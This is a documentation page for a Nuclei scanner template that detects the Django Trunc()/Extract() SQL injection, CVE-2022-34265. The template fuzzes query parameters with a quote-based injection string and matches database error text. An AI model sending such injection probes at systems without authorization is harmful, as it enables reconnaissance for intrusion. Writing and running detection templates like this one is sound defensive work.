Skip to content
Nuclei Templates

Django - SQL injection

ID: CVE-2022-34265

Severity: critical

Author: princechaddha

Tags: sqli,dast,vulhub,cve,cve2022,django

Description

Section titled “Description”

An issue was discovered in Django 3.2 before 3.2.14 and 4.0 before 4.0.6. The Trunc() and Extract() database functions are subject to SQL injection if untrusted data is used as a kind/lookup_name value. Applications that constrain the lookup name and kind choice to a known safe list are unaffected.

YAML Source

Section titled “YAML Source”
id: CVE-2022-34265


info:
  name: Django - SQL injection
  author: princechaddha
  severity: critical
  description: |
    An issue was discovered in Django 3.2 before 3.2.14 and 4.0 before 4.0.6. The Trunc() and Extract() database functions are subject to SQL injection if untrusted data is used as a kind/lookup_name value. Applications that constrain the lookup name and kind choice to a known safe list are unaffected.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/django/CVE-2022-34265
    - https://nvd.nist.gov/vuln/detail/CVE-2022-34265
    - https://www.djangoproject.com/weblog/2022/jul/04/security-releases/
    - https://docs.djangoproject.com/en/4.0/releases/security/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-34265
    cwe-id: CWE-89
  tags: sqli,dast,vulhub,cve,cve2022,django


variables:
  rand_string: '{{rand_text_alpha(15, "abc")}}'


http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'


    fuzzing:
      - part: query
        fuzz:
          - "test'{{rand_string}}"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'syntax error at or near "{{rand_string}}&quot'
          - 'LINE 1: SELECT DATE_TRUNC'
        condition: and


      - type: status
        status:
          - 500
# digest: 4a0a00473045022100f6bab24a5adea777e32c36b72485c0c608dbd991b9fb2c3fb4cdb52ad7fad6ae022076c4a91e8602b76617f44c2e3386f66d5e97a998ea4ea225a59fba922208f5c8:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "dast/cves/2022/CVE-2022-34265.yaml"

View on Github